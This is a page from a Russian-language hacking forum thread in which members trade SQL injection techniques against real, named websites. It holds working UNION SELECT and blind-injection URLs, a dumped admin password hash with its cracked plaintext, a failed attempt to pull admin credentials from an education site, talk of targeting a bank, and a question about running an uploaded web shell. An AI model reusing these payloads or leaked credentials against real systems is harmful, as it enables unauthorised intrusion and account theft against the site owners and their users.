HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2311  
Старый 12.06.2008, 22:23
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

2 sabe
Цитата:
Сообщение от sabe  
уверен что это скуль..?)
 
Ответить с цитированием

  #2312  
Старый 12.06.2008, 22:27
MaZaHaKer
Участник форума
Регистрация: 19.01.2008
Сообщений: 111
С нами: 9636913

Репутация: 73
По умолчанию

Цитата:
Сообщение от sabe  
это Оракл?

как реализовать?)
никак
 
Ответить с цитированием

  #2313  
Старый 12.06.2008, 22:39
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

спс..) а то я думаю... банк все же))))))
 
Ответить с цитированием

  #2314  
Старый 13.06.2008, 02:37
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Цитата:
Сообщение от jokester  
Велемир
какие подзапросы?
_http://www.a2k.org.ua/news.php?id=-1978+UNION+SELECT+1,2,3,4,VERSION(),password,user, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28%20,29,30,31,32,33,34,35,36,37,38+from+u sers--
4.1.22-standard
d23d8b79f575bcc0eedfb8c4e2f13540
admin
Кстати незамысловатый пасс
admin:repz
Да сломать то я его уже давно сломал,меня интересует не это.Есть банковский сайт на 4-ой версии,а до сих пор не научилсо работатьс подзапросами нормально =)),ибо там нужно знать,правильно ли ты подобрал таблицу или нет(вывода нету там).Не вслепую же всё подбирать ? Там ничего не выводится и мне нужно знать, как точно определить существование таблицы с юзерами к примеру,чтобы потом спокойно быть уверенным в том,что я правильно подбираю поля к ней.Этот сайт я привёл просто в качестве примера.

ЗЫ: А пароль меня жосско порадовал,когда hashcracking.info помучил гг)
 
Ответить с цитированием

  #2315  
Старый 13.06.2008, 02:46
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
С нами: 10869277

Репутация: 52
По умолчанию

Дык а трабла то в чем?
Код:
http://www.a2k.org.ua/news.php?id=-1978+or+ascii(substring((SELECT%201),1,1))=49/*
 
Ответить с цитированием

  #2316  
Старый 13.06.2008, 03:00
sakh_rider
Новичок
Регистрация: 23.08.2007
Сообщений: 8
С нами: 9852037

Репутация: 2
По умолчанию

Доброго времени суток.
Третий час уже пытаюсь узнать в чем дело:
SQL иньекция на лицо.
Составляю запрос
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/1,concat(admin,0x3a,password,0x3a,usertype),concat(admin,0x3a,password,0x3a,SuperAdministrator)/**/from/**/jos_users/*
Но в ответ пишет:
Код:
Error number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* AND typ = 'hyperlink'' at line 3 
Script stopped.
Может кто знает в чем дело?
 
Ответить с цитированием

  #2317  
Старый 13.06.2008, 03:51
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию

sakh_rider, дело в том что ты не знаешь что такое sql-inj и как оно работает.

По теме - фильтруеца "/*"
 
Ответить с цитированием

  #2318  
Старый 13.06.2008, 04:42
sakh_rider
Новичок
Регистрация: 23.08.2007
Сообщений: 8
С нами: 9852037

Репутация: 2
По умолчанию

Цитата:
Сообщение от n0ne  
sakh_rider, дело в том что ты не знаешь что такое sql-inj и как оно работает.

По теме - фильтруеца "/*"
Да знаю йа что такое sql injection, да и как работают тоже ... Уже были сайты, в которых получалось...
Вот просто множество запросов перепробовал, а вылазит одно и тоже именно на етом сайте

"+" тож пробовал(

Последний раз редактировалось sakh_rider; 13.06.2008 в 05:08..
 
Ответить с цитированием

  #2319  
Старый 13.06.2008, 06:19
sakh_rider
Новичок
Регистрация: 23.08.2007
Сообщений: 8
С нами: 9852037

Репутация: 2
По умолчанию

Блин, столько времени и все зря...
SELECT command denied to user 'ege'@'pro.iot.ru' for table 'users'
 
Ответить с цитированием

  #2320  
Старый 13.06.2008, 12:55
Lancellot
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
С нами: 10396497

Репутация: 56
По умолчанию

ку !
есть трабла имеется сайт на который удалось залить шелл в определенную диру но в ней отключены команды систем() ексек() итд но разришена include !
Вопрос возможно ли сделать так чтобы при инклуде шелла обойти эту диру и заинклудить его на директорию выше?
example:
/сс/сммммс/123/_залит_файл_с функц_инклуд/ возможно ли заинклудить в папку /123/??
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.